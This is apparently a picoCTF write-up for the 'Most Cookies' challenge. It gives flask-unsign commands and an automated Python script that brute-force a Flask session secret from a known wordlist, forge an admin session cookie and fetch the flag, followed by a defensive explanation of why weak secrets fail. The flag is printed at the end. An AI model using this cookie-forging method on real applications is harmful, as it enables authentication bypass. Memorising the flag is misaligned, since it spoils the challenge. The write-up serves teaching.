Most Cookies

This problem requires you to change the payload in the signed Flask session cookie. Since we know all the possible secrets from the server.py file, we can brute force the signing key using flask-unsign. After we get the cookie from the site, we can follow the commands below to unsign the cookie, sign a new payload that grants us admin, and resubmit the new cookie.

Terminal

$ pip install flask-unsign[wordlist]
$ flask-unsign --unsign --cookie eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.YGHZvg.hvmOT3C_J1RVk3yrj7zA9Dxo8lA --wordlist wordlist.txt
[*] Session decodes to: {'very_auth': 'blank'}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 28 attempts
'wafer'
$ flask-unsign --sign --cookie "{'very_auth': 'admin'}" --secret wafer
eyJ2ZXJ5X2F1dGgiOiJhZG1pbiJ9.YGHbOQ.4iogbBnCbe4C3zanPAtBnYj9CUg

Alternatively, you can use the script below, which fetches the cookie, brute-forces the secret, forges the admin session and reads the flag.

Script

# Import Libraries
import ast
import subprocess

import requests
from bs4 import BeautifulSoup

url = "http://mercury.picoctf.net:44693/"

# Get cookie: the first visit sets a signed Flask 'session' cookie
session = requests.Session()
response = session.get(url)
cookie = session.cookies.get_dict().get('session')

# Create wordlist from the candidate secrets listed in server.py
cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]

with open('wordlist.txt', 'w') as F:
    for name in cookie_names:
        F.write(name + "\n")

# Brute force the signing secret. Pass the command as an argument list and
# capture stdout as text (without capture_output the .stdout attribute is
# None). flask-unsign prints the recovered key as a Python literal, e.g.
# 'wafer', on the last line, so parse that line instead of using raw stdout.
unsign = subprocess.run(
    ["flask-unsign", "--unsign", "--cookie", cookie, "--wordlist", "wordlist.txt"],
    capture_output=True, text=True, check=True,
)
secret = str(ast.literal_eval(unsign.stdout.strip().splitlines()[-1]))

# Re-sign a session with very_auth set to admin using the recovered secret
payload = "{'very_auth': 'admin'}"
sign = subprocess.run(
    ["flask-unsign", "--sign", "--cookie", payload, "--secret", secret],
    capture_output=True, text=True, check=True,
)
forged = sign.stdout.strip()  # drop the trailing newline

# Send cookies to website
cookies = dict(session=forged)
response = requests.get(url, cookies=cookies)
soup = BeautifulSoup(response.text, "html.parser")

# Retrieve flag from page
flag = soup.select("body > div.container > div.jumbotron > p:nth-child(2)")[0]
print(flag.get_text())
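The commands and script above work only because the Flask session cookie is signed with a secret drawn from a short, known list. The following Python is an added example, not code from this writeup, from Flask or from flask-unsign: it reimplements Flask's default session signing with the standard library (assuming the defaults of Flask's SecureCookieSessionInterface: HMAC-SHA1, key_derivation "hmac", salt "cookie-session"; the function names are my own) and uses it to show the three points a defender should take from this challenge: the cookie payload is readable by anyone without the key, a secret chosen from the 28-entry list is recovered by one pass over that list, and a secret generated with secrets.token_urlsafe is not.

```python
"""Added example: stdlib-only model of Flask's signed session cookie.

Assumes Flask's default session signing (HMAC-SHA1, key_derivation="hmac",
salt "cookie-session"). Illustration only; not Flask's or flask-unsign's code.
"""
import base64
import hashlib
import hmac
import json
import secrets
import time
import zlib

SALT = b"cookie-session"  # Flask's default session salt

# The candidate secrets from the challenge's server.py (same list as the writeup)
COOKIE_NAMES = [
    "snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread",
    "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter",
    "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon",
    "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron",
    "black and white", "white chocolate macadamia",
]


def _b64e(raw):
    """URL-safe base64 without '=' padding, as itsdangerous encodes it."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64d(text):
    """Inverse of _b64e: restore padding, then decode."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def derive_key(secret):
    """key_derivation='hmac': the signing key is HMAC-SHA1(secret, salt)."""
    return hmac.new(secret.encode(), SALT, hashlib.sha1).digest()


def sign_session(payload, secret, timestamp=None):
    """Build body.timestamp.signature the way a Flask app does."""
    body = _b64e(json.dumps(payload, separators=(",", ":")).encode())
    ts = int(time.time()) if timestamp is None else timestamp
    stamp = _b64e(ts.to_bytes(max(1, (ts.bit_length() + 7) // 8), "big"))
    signed = f"{body}.{stamp}"
    sig = hmac.new(derive_key(secret), signed.encode(), hashlib.sha1).digest()
    return f"{signed}.{_b64e(sig)}"


def decode_payload(cookie):
    """The payload is signed, not encrypted: anyone can read it without the key."""
    body = cookie.rsplit(".", 2)[0]
    if body.startswith("."):  # itsdangerous prefixes zlib-compressed payloads with '.'
        return json.loads(zlib.decompress(_b64d(body[1:])))
    return json.loads(_b64d(body))


def verify_session(cookie, secret):
    """Constant-time check of the signature under one candidate secret."""
    body, stamp, sig = cookie.rsplit(".", 2)
    expected = hmac.new(derive_key(secret), f"{body}.{stamp}".encode(), hashlib.sha1).digest()
    return hmac.compare_digest(expected, _b64d(sig))


def recover_secret(cookie, candidates):
    """Audit helper: the first candidate that verifies the cookie, else None."""
    for candidate in candidates:
        if verify_session(cookie, candidate):
            return candidate
    return None


if __name__ == "__main__":
    weak = sign_session({"very_auth": "blank"}, "wafer")
    print("payload readable without the key:", decode_payload(weak))
    print("secret recovered from the 28-word list:", recover_secret(weak, COOKIE_NAMES))
    strong = sign_session({"very_auth": "blank"}, secrets.token_urlsafe(32))
    print("same list against a random secret recovers:", recover_secret(strong, COOKIE_NAMES))
    # The cookie captured in the writeup; under the assumptions above it should
    # verify with 'wafer', the key flask-unsign reported.
    writeup_cookie = "eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.YGHZvg.hvmOT3C_J1RVk3yrj7zA9Dxo8lA"
    print("writeup cookie verifies under 'wafer':", verify_session(writeup_cookie, "wafer"))
```

Two design points: verify_session compares digests with hmac.compare_digest so a verifier does not leak timing information about the expected signature, and recover_secret is the whole brute force, which shows why the only real fix is the secret itself (a random value of at least 32 bytes that appears in no list), since neither the signing scheme nor the payload format is at fault.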

Flag

picoCTF{pwn_4ll_th3_cook1E5_dbfe90bf}